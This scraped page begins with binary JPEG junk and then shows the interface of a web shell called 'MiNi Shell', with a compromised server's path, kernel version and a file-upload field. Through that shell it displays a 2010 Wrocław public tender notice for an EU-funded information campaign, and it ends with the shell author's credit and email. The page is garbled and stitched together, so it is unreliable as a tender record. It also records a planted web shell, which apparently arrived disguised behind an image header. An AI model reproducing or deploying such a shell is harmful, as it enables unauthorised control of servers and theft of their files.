JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/thread-self/root/home/vmanager/www/common/web/tenders/20100614/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/thread-self/root/home/vmanager/www/common/web/tenders/20100614/166798-N-2010.html

<p class="kh_header"><b>Wrocław: Przygotowanie i przeprowadzenie kampanii informacyjnej dla 16 projektów współfinansowanych w ramach Regionalnego Programu Operacyjnego dla Województwa Dolnośląskiego w ramach Priorytetu 9 oraz dla projektu Budowa ścieżek rowerowych we Wrocławiu współfinansowanego w ramach Regionalnego Programu Operacyjnego dla Województwa Dolnośląskiego w ramach Priorytetu 6.</b><br>
<b>Numer ogłoszenia: 166798 - 2010; data zamieszczenia: 14.06.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Wrocław Urząd Miejski Wrocławia , pl. Nowy Targ 1/8, 50-141 Wrocław, woj. dolnośląskie, tel. 071 7779230, 7779231, faks 071 7779229.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przygotowanie i przeprowadzenie kampanii informacyjnej dla 16 projektów współfinansowanych w ramach Regionalnego Programu Operacyjnego dla Województwa Dolnośląskiego w ramach Priorytetu 9 oraz dla projektu Budowa ścieżek rowerowych we Wrocławiu współfinansowanego w ramach Regionalnego Programu Operacyjnego dla Województwa Dolnośląskiego w ramach Priorytetu 6..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Zadanie nr 1
Poprawa jakości życia na obszarze wsparcia poprzez kompleksową rewitalizację
wnętrza podwórzowego w obrębie ulic pl. Staszica, Chrobrego, św. Wincentego.
Tablica pamiątkowa granitowa szt. 2 Ulotki informacyjne A5 szt. 500 Plakaty
informacyjne A2 szt. 100 Plakaty informacyjne A1 szt. 19 Nośniki elektroniczne szt.
40 Konferencja prasowa szt. 2 Termin wykonania zamówienia:od dnia zawarcia
umowy do 31.05.2012 r. 
Zadanie nr 2 Poprawa jakości życia na obszarze wsparcia
poprzez kompleksową rewitalizację budynku przy ul. Roosevelta 5a na cele
kulturalne wraz z remontem wnętrza podwórzowego w obrębie ulic Słowiańska,
Roosevelta, Jedności Narodowej Tablica pamiątkowa granitowa szt. 3 Tablica
pamiątkowa pleksi szt. 1 Plakaty informacyjne A2 szt. 200 Plakaty informacyjne A1
szt. 25 Nośniki elektroniczne szt. 25 Konferencja prasowa szt. 2 Termin wykonania
zamówienia:od dnia zawarcia umowy do 31.05.2012 r. 
Zadanie nr 3 
Poprawa jakości życia na obszarze wsparcia poprzez kompleksową rewitalizacje wnętrza podwórzowego w obrębie ulic Jagiellończyka, Niemcewicza, Słowiańska,
Trzebnicka Tablica pamiątkowa granitowa szt. 2 Plakaty informacyjne A2 szt. 100
Plakaty informacyjne A1 szt. 19 Nośniki elektroniczne szt. 50 Konferencja prasowa
szt. 2 Termin wykonania zamówienia:od dnia zawarcia umowy do 31.05.2012 r.
Zadanie nr 4 
Poprawa jakości życia na obszarze wsparcia poprzez kompleksową
rewitalizację wnętrza podwórzowego w obrębie ulic Paulińska, św. Macieja,
Henryka Brodatego, Rydygiera Tablica pamiątkowa granitowa szt. 1 Ulotki
informacyjne A5 szt. 500 Plakaty informacyjne A2 szt. 200 Plakaty informacyjne A1
szt. 25 Nośniki elektroniczne szt. 40 Konferencja prasowa szt. 2 Termin wykonania
zamówienia:od dnia zawarcia umowy do 31.05.2012 r. 
Zadanie nr 5 
Poprawa jakości życia na obszarze wsparcia poprzez kompleksową rewitalizację budynku przy ul. Jagiellończyka10a na cele kulturalne wraz z remontem wnętrza
podwórzowego w obrębie ulic św. Wincentego, Bolesława Chrobrego,
Jagiellończyka, Rydygiera Tablica pamiątkowa granitowa szt. 1 Tablica
pamiątkowa pleksi szt. 1 Ulotki informacyjne A5 szt. 500 Plakaty informacyjne A2 szt. 100 Plakaty informacyjne A1 szt. 25 Nośniki elektroniczne szt. 40 Konferencja
prasowa szt. 2 Termin wykonania zamówienia:od dnia zawarcia umowy do
31.05.2012 r. 
Zadanie nr 6 
Poprawa jakości życia na obszarze wsparcia poprzez kompleksową rewitalizacje wnętrza podwórzowego w obrębie ulic Rydygiera, Bolesława Chrobrego, Jagiellończyka, Paulińska 
Tablica pamiątkowa granitowa szt. 2 Ulotki informacyjne A5 szt. 500 Plakaty informacyjne A2 szt. 100 Plakaty informacyjne A1 szt. 19 Nośniki elektroniczne szt. 40 Konferencja prasowa szt. 2
Termin wykonania zamówienia:od dnia zawarcia umowy do 31.05.2012 r. 
Zadanie nr 7 Utworzenie lokalnego Centrum Rozwoju Zawodowego. Tablica pamiątkowa pleksi szt. 2 Ulotki informacyjne A5 szt. 500 Plakaty informacyjne A2 szt. 200 Plakaty informacyjne A1 szt. 25 Nośniki elektroniczne szt. 40 Konferencja prasowa szt. 2 Termin wykonania zamówienia:od dnia zawarcia umowy do 31.05.2012 r.
Zadanie nr 8 Kreacja Nadodrzańskiego Centrum Wsparcia jako kluczowego
elementu infrastruktury służącej społeczności lokalnej i podopiecznym MOPS -
rewitalizacja budynków przy ul. Rydygiera we Wrocławiu Tablica pamiątkowa
pleksi szt. 1 Ulotki informacyjne A5 szt. 500 Plakaty informacyjne A2 szt. 100
Naklejki informacyjne szt. 200 Nośniki elektroniczne szt. 10 Konferencja prasowa
szt. 2 Termin wykonania zamówienia:od dnia zawarcia umowy do 30.06.2012 r.
Zadanie nr 9 
Budowa monitoringu prewencyjnego jako elementu polityki poprawy 
bezpieczeństwa na Obszaru Wsparcia Tablica pamiątkowa pleksi szt. 1 Ulotki
informacyjne A5 szt. 1500 Plakaty informacyjne A2 szt. 300 Plakaty informacyjne
A1 szt. 50 Konferencja prasowa szt. 1 Termin wykonania zamówienia:od dnia
zawarcia umowy do 28.02.2011 r. 
Zadanie nr 10 Remont i modernizacja infrastruktury przestrzeni publicznej służącej ogółowi mieszkańców Obszaru Wsparcia - przebudowa Parku Staszica Tablica pamiątkowa granitowa szt.2 Ulotki informacyjne A5 szt. 500 Plakaty informacyjne A2 szt. 100 Plakaty informacyjne A1 szt. 19 Nośniki elektroniczne szt. 40 Konferencja prasowa szt. 2 Termin wykonania zamówienia:od dnia zawarcia umowy do 30.06.2012r. 
Zadanie nr 11 Remont i modernizacja infrastruktury przestrzeni publicznej służącej ogółowi mieszkańców Obszaru Wsparcia - przebudowa zieleńca przy ul. Pomorskiej - Kaszubskiej Tablica pamiątkowa granitowa szt.2 Ulotki informacyjne A5 szt. 500 Plakaty informacyjne A2 szt. 100 Plakaty informacyjne A1 szt. 19 Nośniki elektroniczne szt. 40 Konferencja prasowa szt. 2 Termin wykonania zamówienia:od dnia zawarcia umowy do 30.11.2012 r. 
Zadanie nr 12 Remont i modernizacja infrastruktury przestrzeni publicznej służącej ogółowi mieszkańców Obszaru Wsparcia - przebudowa zieleńca przy placu Strzeleckim Tablica pamiątkowa granitowa szt. 2 Ulotki informacyjne A5 szt. 500 Plakaty informacyjne A2 szt. 100 Plakaty informacyjne A1 szt. 19 Nośniki elektroniczne szt. 40 Konferencja prasowa szt. 2
Termin wykonania zamówienia:od dnia zawarcia umowy do 30.11.2012r.
 Zadanie nr 13 Modernizacja zespołu budynków Liceum Ogólnokształcącego Nr 1 przy ul.Poniatowskiego 9 we Wrocławiu- Etap II 
Tablica pamiątkowa pleksi szt. 2 Plakaty informacyjne A2 szt. 200 Plakaty informacyjne A1 szt. 25 Nośniki elektroniczne szt.50 Konferencja prasowa szt. 2 Termin wykonania zamówienia:od dnia zawarcia umowy do 30.06.2012r. 
Zadanie nr 14 Modernizacja zespołu budynków Liceum Ogólnokształcącego Nr 1 przy ul. Poniatowskiego 9 we Wrocławiu- Etap I 
Tablica pamiątkowa pleksi szt. 1 Plakaty informacyjne A2 szt. 200 Nośniki elektroniczne szt. 45 Termin wykonania zamówienia:od dnia zawarcia umowy do 15.07.2010r.
Zadanie nr 15 Modernizacja budynku Gimnazjum Nr 15 przy ul. Jedności
Narodowej 117 we Wrocławiu wraz z zagospodarowaniem terenów na cele
rekreacyjno-sportowe - II etap 
Tablica pamiątkowa pleksi szt. 1 Ulotki informacyjne A5 szt. 2000 Plakaty informacyjne A2 szt. 200 Plakaty informacyjne A1 szt. 25 Nośniki elektroniczne szt. 40 Konferencja prasowa szt. 2 Termin wykonania zamówienia:od dnia zawarcia umowy do 31.05.2012 r. 
Zadanie nr 16 Modernizacja budynku Gimnazjum Nr 15 przy ul. Jedności Narodowej 117 we Wrocławiu wraz z zagospodarowaniem terenów na cele rekreacyjno-sportowe - I etap 
Tablica pamiątkowa pleksi szt. 1 Plakaty informacyjne A2 szt. 200 Plakaty informacyjne A1 szt. 20 Nośniki elektroniczne szt. 33 Termin wykonania zamówienia:od dnia zawarcia umowy do 15.07.2010r. 
Zadanie nr 17 Budowa ścieżek rowerowych we Wrocławiu 
Ulotki informacyjne A5 szt.1200 Breloki odblaskowe szt. 1200 Opaski 
odblaskowe samozaciskowe szt.200 Kubki ceramiczne szt. 200 Zestaw narzędzi do naprawy usterek rowerowych szt.100 Długopisy szt. 500 Mini mapy szt.130 Termin wykonania zamówienia:od dnia zawarcia umowy do 31.10.2010r.

Zamawiający przewiduje zorganizowanie 2 konferencji prasowych - wspólnie dla 14 projektów na 100 osób każda. Należy pamiętać, że koszty wspólne (zaproszenia, catering oraz dokumentacja zdjęciowa i cyfrowa) zorganizowania 1 konferencji należy podzielić na 14 projektów, a nie mnożyć. Dla wszystkich 14 projektów ma być 100 zaproszeń, jeden catering i jedna dokumentacja (dla każdego projektu osobno na płycie DVD). Zamawiający zapewnia również pomieszczenie w którym odbędzie się konferencja prasowa..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 79.34.14.00-0.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.11.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> wadium w wysokości 5.000,00 PLN</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>a)wykonał, w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, co najmniej trzy usługi odpowiadające swoim rodzajem usłudze stanowiącej przedmiot zamówienia tj. kampanie informacyjne/ reklamowe o wartości minimum 15.000,00 zł brutto każda oraz udokumentuje, że usługi te zostały wykonane należycie. 
b)wykonał, w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, co najmniej dwie
usługi odpowiadające swoim rodzajem usłudze stanowiącej przedmiot zamówienia tj. konferencje prasowe o wartości minimum 2.500,00 zł brutto każda oraz udokumentuje, że usługi te zostały wykonane należycie.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>W przypadku składania oferty przez Wykonawców wspólnie ubiegających się o
udzielenie zamówienia, Wykonawcy ustanawiają pełnomocnika do
reprezentowania ich w postępowaniu o udzielenie zamówienia albo
reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia
publicznego, oraz załączają do oferty - pełnomocnictwo do reprezentowania
Wykonawców w postępowaniu o udzielenie zamówienia albo reprezentowania w
postępowaniu i zawarcia umowy w sprawie zamówienia publicznego.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.Zamawiający przewiduje możliwość zmian postanowień zawartej umowy w
stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy, w
przypadku wystąpienia co najmniej jednej z okoliczności wymienionych poniżej, z
uwzględnieniem podawanych warunków ich wprowadzenia. -zmiana terminu
realizacji przedmiotu zamówienia zgodnie ze zmianami w umowach o
dofinansowanie, w szczególności w przypadku zmiany harmonogramu
terminowego realizacji przedmiotowego projektu, -zmiana sposobu rozliczania
umowy lub dokonywania płatności na rzecz wykonawcy na skutek zmian zawartej
przez Zamawiającego umowy o dofinansowanie projektu lub wytycznych
dotyczących realizacji projektu -zmiana obowiązującej stawki VAT; Jeśli zmiana
stawki VAT będzie powodować zwiększenie kosztów wykonania umowy po stronie
Wykonawcy, Zamawiający dopuszcza możliwość zwiększenia wynagrodzenia o
kwotę równą różnicy w kwocie podatku zapłaconego przez wykonawcę. -zmiana
osób przy pomocy których Wykonawca realizuje przedmiot umowy - dopuszcza się
zmianę osób przedstawionych w ofercie jedynie w uzasadnionych przez
Wykonawcę przypadkach oraz za uprzednią pisemną zgodą Zamawiającego.
Zamawiający nie może odmówić takiej zgody jeśli nowe osoby będą spełniały
warunki określone przez zamawiającego w ogłoszeniu i siwz -Jeśli w ramach
wykazania spełniania warunku wiedzy i doświadczenia Wykonawca korzysta z
zasobów podmiotu trzeciego, który będzie brał udział w realizacji części
zamówienia jako podwykonawca - Zamawiający dopuszcza możliwość zmiany podwykonawcy jeśli wykaże on, że posiada co najmniej takie doświadczenie jakie
wymagane było dla spełnienia warunku wiedzy i doświadczenia. 2.Przewidziane
powyżej okoliczności stanowiące podstawę zmian do umowy, stanowią
uprawnienie Zamawiającego nie zaś jego obowiązek wprowadzenia takich zmian.
3.Nie stanowi zmiany umowy w rozumieniu art. 144 ustawy Pzp: zmiana danych
związanych z obsługą administracyjno-organizacyjną Umowy, zmiany danych
teleadresowych, zmiany osób wskazanych do kontaktów między Stronami.
4.Wszelkie zmiany i uzupełnienia umowy wymagają formy pisemnej pod rygorem
nieważności za zgodą obu stron. 5.Wszelkie zmiany muszą być dokonywane z
zachowaniem przepisu art. 140 ust. 1 ustawy Prawo zamówień publicznych (Dz. U.
z 2007r. nr 223, poz.1655 ze zmianami) i art.140 ust. 3 stanowiącego, że umowa
podlega unieważnieniu w części wykraczającej poza określenie przedmiotu
zamówienia zawartego w Specyfikacji Istotnych Warunków Zamówienia.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.wroclaw.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Gmina Wrocław - Urząd Miejski Wrocławia, Wydział Zamówień Publicznych, 51-
163 Wrocław, al. M. Kromera 44...</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 22.06.2010 godzina 11:00, miejsce: Gmina Wrocław - Urząd Miejski Wrocławia, Wydział Zamówień Publicznych, 51-
163 Wrocław, al. M. Kromera 44. pokój 135.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Regionalnego Programu Operacyjnego dla Województwa Dolnośląskiego w ramach Priorytetu 9 Odnowa zdegradowanych obszarów miejskich na terenie Dolnego Śląska (Miasta), Działania 9.1 Odnowa zdegradowanych obszarów miejskich w miastach powyżej 10 tysięcy mieszkańców oraz dla projektu Budowa ścieżek rowerowych we Wrocławiu współfinansowanego w ramach Regionalnego Programu Operacyjnego dla Województwa Dolnośląskiego w ramach Priorytetu 6 Wykorzystanie i promocja potencjału turystycznego i kulturowego Dolnego Śląska, Działania 6.2 Turystyka aktywna..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com